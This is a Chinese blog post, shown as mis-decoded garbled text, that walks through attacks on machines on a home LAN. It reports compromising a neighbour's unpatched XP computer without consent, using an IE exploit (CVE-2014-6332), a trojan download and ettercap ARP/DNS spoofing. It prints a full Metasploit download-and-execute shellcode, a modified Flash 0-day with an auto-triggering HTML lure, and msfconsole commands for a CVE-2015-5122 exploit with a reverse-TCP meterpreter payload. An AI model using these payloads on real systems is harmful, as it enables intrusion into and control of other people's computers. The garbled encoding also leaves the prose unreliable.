¼ÒÍ¥ÄÚÍøÉøÍ¸´óÔÓ»â

admin ·¢±íÓÚ 2022-3-31 02:05:55

ÏÐÀ´ÎÞÊÂ£¬¾ÍÏë×ÅÐ´Ò»ÆªÄÚÍøÉøÍ¸´óÔÓ»âµÄÎÄÕÂ£¬Ö®Ç°ÓÃÁ«»¨ÏÉ×ÓÕËºÅÐ´µÄÁ½ÆªÄÚÍøÉøÍ¸ÎÄÕÂ·Ö±ðÎªÉøÍ¸²âÊÔÄ³´óÐÍ¾ÖÓòÍø¡¢ÉøÍ¸²âÊÔÄ³´óÐÍ¾ÖÓòÍøÍø¹Ø·À»ðÇ½£¬ÏÖÈç½ñºÅ¶¼±»É¾ÁË£¬°¥£¡Ö®Ç°ÄÇ¸öÕËºÅ10rank£¬¶àÃ´¿ÉÏ§°¡£¡ºÃÁËÎÒÃÇ³¤»°¶ÌËµ²½ÈëÕýÌâ£¡ 
 
µÚÒ»Æª  ÀûÓÃCVE-2014-6332 IEÈ«°æ±¾Â©¶´ÈëÇÖÁÚ¾ÓXPµçÄÔ 
 
     Ê×ÏÈ¿ªÆªµÄÊÇÈëÇÖÁÚ¾ÓµÄµçÄÔ£¬ÁÚ¾ÓÊÇ¸öµçÄÔÃ¤£¬ÎÒËùÁË½âµÄÇé¿öÊÇ2011ÄêÂòÁËµçÄÔ£¬¼¸ºõ²»ÔõÃ´ÓÃ£¬¶øÇÒÒ²²»°²×°É±¶¾£¬¹À¼Æ²¹¶¡¶¼²»»á´ò°É£¬¾ÍÐÇÆÚÌìÓÃÒ»ÏÂ£¬ÕýºÃ½ñÌìÖÜÄ©£¬ÓÚÊÇºõ¾Í¿ªÊ¼ÏÂÃæµÄÉøÍ¸¹ý³Ì¡£Ê×ÏÈnet view£¨ÕâÀï¾Í²»ÓÃnmapÉ¨ÁË£©ÈçÍ¼£º 
<img width="600" height="287" src="https://www.2k8.org/content/uploadfile/202203/17/9a326117.png" alt="1-1.png" style="vertical-align:middle;" /> 
ZhongceÄÇÌ¨ÊÇÎÒµÄ£¬ÎÒÃÇpingÒ»ÏÂping BBLBX6GQE624W88ÈçÍ¼£º 
<img width="600" height="403" src="https://www.2k8.org/content/uploadfile/202203/17/a759186b.png" alt="1-2.png" style="vertical-align:middle;" /> 
 
USER-20150620EZÕâ¸ö¾Í²»ÓÃPingÁËÊÇÎÒµÄÎïÀíÖ÷»úÃû£¬OK£¬¼ÈÈ»Ã»´ò²¹¶¡£¬ÄÇ¾Í²»ÓÃnessusÉ¨ÃèÁË£¬Ö±½Ó²âÊÔCVE-2014-6332 IEÈ«°æ±¾Â©¶´ÁË£¬ÎÒÃÇÐèÒª´î½¨Ò»¸öweb»·¾³ÕâÀïÎÒÓÃÐ¡Ðý·ç£¬ÏÈÅäÖÃÒ»¸öÔ¶¿ØÄ¾ÂíÈçÍ¼£º 
 
<img width="601" height="377" src="https://www.2k8.org/content/uploadfile/202203/17/483266d7.png" alt="1-3.png" style="vertical-align:middle;" /> 
192.168.0.104ÊÇÎÒµÄÎïÀíip£¬È»ºóÑ¡ÔñÓòÃûÉÏÏß·½Ê½£¬Éú³ÉÄ¾Âí¶ªµ½web¸úÄ¾ÏÂ£¬ÏÂÃæÎÒÃÇÓÃk8·Éµ¶¹¤¾ßÀ´Éú³ÉÒ»¸öÍøÂí£¬µã±àÂëÈ»ºóÊäÈëÄ¾ÂíµØÖ·£º<a href="http://192.168.0.104:89/server.exe" target="_blank">http://192.168.0.104:89/server.exe</a> 
È»ºóµãÓÒ¼ühacking-0day-ieÈ«°æ±¾Â©¶´£¬Éú³ÉÍøÂíÈçÍ¼£º 
<img width="600" height="400" src="https://www.2k8.org/content/uploadfile/202203/17/9dc01d18.png" alt="1-4.png" style="vertical-align:middle;" /> 
 
È»ºóÎÒÃÇ°ÑÍøÃûÃû³Æ¸ÄÎª£ºindex.htmÈ»ºó¶ªµ½kai linux /var/www/html/ÏÂÃæ 
<img width="600" height="367" src="https://www.2k8.org/content/uploadfile/202203/17/de9a2eca.png" alt="1-5.png" style="vertical-align:middle;" /> 
ÎÒÃÇµÄË¼Â·ÊÇÍ¨¹ýettercapÀ´dns+arp¹¥»÷µÄ·½·¨À´Ê¹xpÖÖÄ¾Âí£¬¶ÔÁË¼ÇµÃÖ´ÐÐservice apache2 startÃüÁîÆô¶¯kali web·þÎñ£¬ÏÂÃæÎÒÃÇÀ´ÉèÖÃÒ»ÏÂetteracapµÄetter.dnsÈçÍ¼£º 
 
<img width="600" height="286" src="https://www.2k8.org/content/uploadfile/202203/17/dd69fa40.png" alt="1-6.png" style="vertical-align:middle;" /> 
192.168.0.113ÎªkaliµÄipµØÖ·£¬È»ºóettercap -GÆô¶¯Í¼ÐÎ»¯½çÃæ£¬µã 
 
<img width="599" height="363" src="https://www.2k8.org/content/uploadfile/202203/17/bdbf0d10.png" alt="1-7.png" style="vertical-align:middle;" /> 
È»ºóÑ¡Ôñeth0 
<img width="599" height="334" src="https://www.2k8.org/content/uploadfile/202203/17/b71eb60c.png" alt="1-8.png" style="vertical-align:middle;" /> 
È»ºóÑ¡Ôñhostlist£¬ÈçÍ¼£º 
 
<img width="584" height="318" src="https://www.2k8.org/content/uploadfile/202203/17/49d2e5b0.png" alt="1-9.png" style="vertical-align:middle;" /> 
Ç°ÃæÎÒÃÇÒÑ¾Ping¹ýÁËxpÏµÍ³ipÎª192.168.0.116£¬ÄÇÃ´ÎÒÃÇ¾Í°ÑÕâ¸öÄ¿±ê¼Óµ½Target1£¬È»ºó°ÑÍø¹ØµØÖ·¼Óµ½Target2£¬È»ºóÔÚ°´ÕÕÈçÍ¼²Ù×÷£º 
<img width="601" height="298" src="https://www.2k8.org/content/uploadfile/202203/17/f352a8de.png" alt="1-10.png" style="vertical-align:middle;" /> 
È»ºóÑ¡ÔñPlugins£¬Ñ¡Ôñ 
 
<img width="600" height="342" src="https://www.2k8.org/content/uploadfile/202203/17/e951c4b4.png" alt="1-11.png" style="vertical-align:middle;" /> 
Ë«»÷ÒÔºó£¬È»ºó¿ªÊ¼ 
 
<img width="600" height="453" src="https://www.2k8.org/content/uploadfile/202203/17/a74ba7d6.png" alt="1-12.png" style="vertical-align:middle;" /> 
´ó¸Å¹ýÁË°ë·ÖÖÓ·¢ÏÖÓÐÖ÷»úÉÏÏß£¬¹þ¹þÆÛÆ³É¹¦ÁË 
<img width="600" height="327" src="https://www.2k8.org/content/uploadfile/202203/17/3a55d79c.png" alt="1-13.png" style="vertical-align:middle;" /> 
 
ÎÒÃÇ´ò¿ªÆÁÄ»¿´¿´ 
<img width="600" height="345" src="https://www.2k8.org/content/uploadfile/202203/17/ec73cab9.png" alt="1-14.png" style="vertical-align:middle;" /> 
 
Ëû¿Ï¶¨ÊÇ¿´ÊÓÆÁÈ»ºó·¢ÏÖ¿´²»ÁËÁË¾Í´ò¿ªhao123²âÊÔÍøÂç£¬¹þ¹þÎÒÃÇ²»Òª¸ãÊ²Ã´ÆÆ»µÐ¶ÔØµôÄ¾Âí¡£¡£¡£ÕâÑùÉøÍ¸²âÊÔÁÚ¾ÓXPµÄÉøÍ¸¹ý³Ì¾ÍÍê½áÁË¡£¡£¡£ 
 
µÚ¶þÆª  flash 0dayÖ®ÊÖ¹¤ÐÞ¸Ä´úÂëÀûÓÃmsfÖÆ×÷ÏÂÔØÕßÊµÀýÈëÇÖÑÝÊ¾ 
 
ÀûÓÃµ½µÄ¹¤¾ß£º 
Msf 
Ettercap 
Adobe Flash CS6 
Hacking Team Flash 0day-¿É³åÆÆChromeÉ³ºÐ-Evil0XÔ´´úÂëÒ»·Ý 
 
  ÏÂÃæÎÒÃÇ¾Í¿ªÊ¼ÑÝÊ¾ÈëÇÖ£¬ÀûÓÃmsfÉú³Éshellcode,Ê×ÏÈ´ò¿ªmsfÖ´ÐÐuse windows/download_exec£¬show options 
ÈçÍ¼£º 
 
<img width="558" height="268" src="https://www.2k8.org/content/uploadfile/202203/17/ff8260e7.png" alt="2-1.png" style="vertical-align:middle;" /> 
 
È»ºóset EXE system.exe,ÔÙÖ´ÐÐset URL,ÐèÒªËµÃ÷Ò»ÏÂURL¾ÍÊÇÎÒÃÇµÄÂíµÄÏÂÔØµØÖ·£¬ÕâÀïÎÒÃÇÓÃÔ¶¿ØÂí£¬Ô¶¿ØÅäÖÃÊ¹ÓÃ²»ÔÙÏêÏ¸ËµÃ÷¡£¡£¡£ÈçÍ¼: 
 
<img width="601" height="281" src="https://www.2k8.org/content/uploadfile/202203/17/c2282b79.png" alt="2-2.png" style="vertical-align:middle;" /> 
È»ºóÖ´ÐÐgenerate -t dwordÉú³Éshellcode£¬ÈçÏÂ£º 
 
<img width="600" height="295" src="https://www.2k8.org/content/uploadfile/202203/17/833af9c2.png" alt="2-3.png" style="vertical-align:middle;" /> 
 
¸´ÖÆ´úÂëµ½ÎÄ±¾ÏÂ±ãÓÚÎÒÃÇÒ»»á±à¼flash exp£¬ÈçÏÂ£º

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000


ÏÂÃæÎÒÃÇÀ´ÐÞ¸Äflash 0day exp£¬ÐèÒªÐÞ¸ÄÈý¸öÎÄ¼þ£¬·Ö±ðÎª£º 
 
 
<img width="601" height="328" src="https://www.2k8.org/content/uploadfile/202203/17/f86a8bf0.png" alt="2-4.png" style="vertical-align:middle;" /> 
ÏÈÐÞ¸ÄShellWin32.as£¬²¿·ÖÔ´´úÂëÈçÍ¼£º 
 
<img width="600" height="303" src="https://www.2k8.org/content/uploadfile/202203/17/72c372e7.png" alt="2-5.png" style="vertical-align:middle;" /> 
ÎÒÃÇÐèÒª°Ñ±ê¼Ç´¦[]ÖÐµÄ´úÂë¸Ä³ÉÓÃmsfÉú³ÉµÄ´úÂë£¬ÐÞ¸ÄºóÈçÏÂ 
 
<img width="600" height="323" src="https://www.2k8.org/content/uploadfile/202203/17/499f94a4.png" alt="2-6.png" style="vertical-align:middle;" /> 
 
È»ºó±£´æ£¬ShellWin64.asµÄÐÞ¸Ä·½·¨ÈçÉÏÊö£¬²»ÔÙÑÝÊ¾£¬ÏÂÃæÎÒÃÇÀ´ÐÞ¸Ämyclass.as,ÕâÀïÐèÒªËµÃ÷Ò»ÏÂ£¬ÒòÎª´ËexpÉú³ÉµÄÀûÓÃ³ÌÐò£¬²»ÄÜÖ±½Ó×Ô¶¯´¥·¢flashÂ©¶´£¬Ò²¾ÍÊÇÐèÒªµã»÷°´Å¥²Å¿ÉÒÔ£¬Êµ¼ÊÉÏÔÚ×öÉøÍ¸µÄÊ±ºòÐèÒª°ÑËü¸ãµÃ¸üÍêÃÀ£¬ËùÒÔ¾ÍÐèÒªÐÞ¸Ä£¬ÐÞ¸Ä·½·¨£ºËÑË÷myclassµÄÄ³¸ö×Ö·ûdoc.addchild(btn);ÈçÍ¼£º 
 
<img width="601" height="362" src="https://www.2k8.org/content/uploadfile/202203/17/1ac9a22a.png" alt="2-7.png" style="vertical-align:middle;" /> 
»»ÐÐÔÚºóÃæ¼ÓÒ»¾äTryExpl();×¢ÒâÊÇl²»ÊÇÊý×Ö1£¬È»ºóÈçÍ¼£º 
 
<img width="553" height="316" src="https://www.2k8.org/content/uploadfile/202203/17/53212752.png" alt="2-8.png" style="vertical-align:middle;" /> 
 
È»ºóµã±£´æ£¬ÏÂÃæÎÒÃÇÀ´±àÒëÒ»ÏÂ£¬´ò¿ª 
exp1.flaÈ»ºóµãÎÄ¼þ-·¢²¼£¬¿´¿´±àÒëÃ»´íÎó 
 
<img width="600" height="313" src="https://www.2k8.org/content/uploadfile/202203/17/e77f7dc1.png" alt="2-9.png" style="vertical-align:middle;" /> 
 
È»ºóÎÒÃÇ°ÑÉú³ÉµÄ 
exp1.swf¶ªµ½kailinux µÄ/var/www/htmlÏÂ£º 
È»ºó°ÑÕâ¶Î´úÂëºÃºÃ±à¼Ò»ÏÂ

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<!DOCTYPE html>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<html>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<head>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<meta http-equiv="Content-Type" content="text/html; 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
charset=utf-8"/>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
</head>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<body>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<h2> Please wait, the requested page is loading...</h2>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<br>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<OBJECT 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><PARAM NAME=movie 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
</body>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<script>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
    setTimeout(function () {

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
        

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
window.location.reload();

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
    }, 10000);

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
 

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
</script>

<p align="left" style="background:white;font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
</html>


×¢Òâ£º192.168.0.109ÊÇkaliµÄipµØÖ·£¬ÕâÊ±ºòÎÒÃÇÐèÒªservice apache2 startÆô¶¯Ò»ÏÂweb·þÎñ£¬È»ºó½«ÉÏÃæµÄhtml±£´æÎªindex.htmÍ¬Ñù¶ªµ½kali webÄ¿Â¼ÏÂ£¬²âÊÔ·ÃÎÊÁ´½Ó´æÔÚÈçÍ¼£º 
 
<img width="600" height="307" src="https://www.2k8.org/content/uploadfile/202203/17/8ce8513e.png" alt="2-10.png" style="vertical-align:middle;" /> 
 
ÏÂÃæÎÒÃÇÓÃettercapÆÛÆÈçÍ¼£º 
 
<img width="600" height="278" src="https://www.2k8.org/content/uploadfile/202203/17/d6f7bbe8.png" alt="2-11.png" style="vertical-align:middle;" /> 
 
ÏÂÃæÎÒÃÇËæ±ã·ÃÎÊ¸öÍøÕ¾¿´¿´£º 
ÎÒ¿¿ÎÒ·¢ÏÖÖ±½ÓÓÃettercapÆÛÆÎïÀí»ú×°ÁËÌÚÑ¶¹Ü¼ÒÕÕÑù¿ÉÒÔÆÛÆ³É¹¦£¬Ä¾ÂíÉÏÏßÈçÍ¼£º 
 
<img width="600" height="291" src="https://www.2k8.org/content/uploadfile/202203/17/43c245aa.png" alt="2-12.png" style="vertical-align:middle;" /> 
 
ÎÒÃÇ¿´ÁíÒ»Ì¨ 
 
<img width="600" height="332" src="https://www.2k8.org/content/uploadfile/202203/17/4395a3a0.png" alt="2-13.png" style="vertical-align:middle;" /> 
 
ÌáÊ¾Õâ¸ö´íÎó£¬ËµÃ÷Ä¾ÂíÊÇ³É¹¦±»ÏÂÔØÖ´ÐÐÁË£¬Ö»ÊÇÓÉÓÚÄ³Ð©ÔÒòÃ»ÉÏÏß¶øÒÑ¡£¡£¡£²»¹ÜËûÁË£¬µÚ¶þÆªover¡£¡£¡£ 
 
 
µÚÈýÆª  cve2015-5122Â©¶´ÊµÀýÑÝÊ¾ÐéÄâ»ú 
 
    ¹ØÓÚcve2015-5122Õâ¸öÂ©¶´£¬´ó¼Ò¿ÉÒÔ°Ù¶ÈÒ»ÏÂ£¬ÊÇ¹ØÓÚflashµÄÂ©¶´£¬ÊÇ2015ÄêflashÂ©¶´µÄµÚ¶þ·¢£¬½ñÌìÎÒÃÇ¾ÍÓÃÕâ¸öÂ©¶´À´ÑÝÊ¾£¬¿ªÆôkai linux msfconsoleÃüÁîÆô¶¯msfÈçÍ¼£º 
search cve-2015-5122ÈçÍ¼£º 
 
<img width="570" height="280" src="https://www.2k8.org/content/uploadfile/202203/17/e2bb9033.png" alt="3-1.png" style="vertical-align:middle;" /> 
ÏÂÃæÎÒÃÇÇÃÈçÏÂÃüÁî£º 
use exploit/multi/browser/adobe_flash_opaque_background_uaf 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 192.168.0.109 
set URIPATH /                        /*¸ùÄ¿Â¼*/ 
set SRVHOST 192.168.0.109  //192.168.0.109Îªkaili ipµØÖ· 
set SRVPORT 80            /*80¶Ë¿Ú*/ Ê¹ÓÃ80¶Ë¿ÚÊ±Òª±£Ö¤apacheÎªÍ£Ö¹×´Ì¬ÓÃservice apache2 stopÃüÁîÍ£Ö¹·ñÔò»áÌáÊ¾¶Ë¿Ú±»Õ¼ÓÃ 
È»ºóshow optionsÈçÍ¼£º 
 
<img width="600" height="314" src="https://www.2k8.org/content/uploadfile/202203/17/082afd09.png" alt="3-2.png" style="vertical-align:middle;" /> 
 
Ò»ÇÐ¶¼ÉèÖÃºÃÁË£¬Ö´ÐÐexploit¡£ÏÂÃæÎÒÃÇ½øetc/ettercapÄ¿Â¼ÏÂÉèÖÃetc.dnsÈçÍ¼£º 
 
<img width="600" height="349" src="https://www.2k8.org/content/uploadfile/202203/17/99c22bba.png" alt="3-3.png" style="vertical-align:middle;" /> 
È»ºóettercap -GÃüÁî´ò¿ªettercap£¬ÎÒÃÇÒª¹¥»÷µÄÖ÷»úipÊÇ192.168.0¡£115 
 
 
<img width="554" height="256" src="https://www.2k8.org/content/uploadfile/202203/17/98b1cf71.png" alt="3-4.png" style="vertical-align:middle;" /> 
 
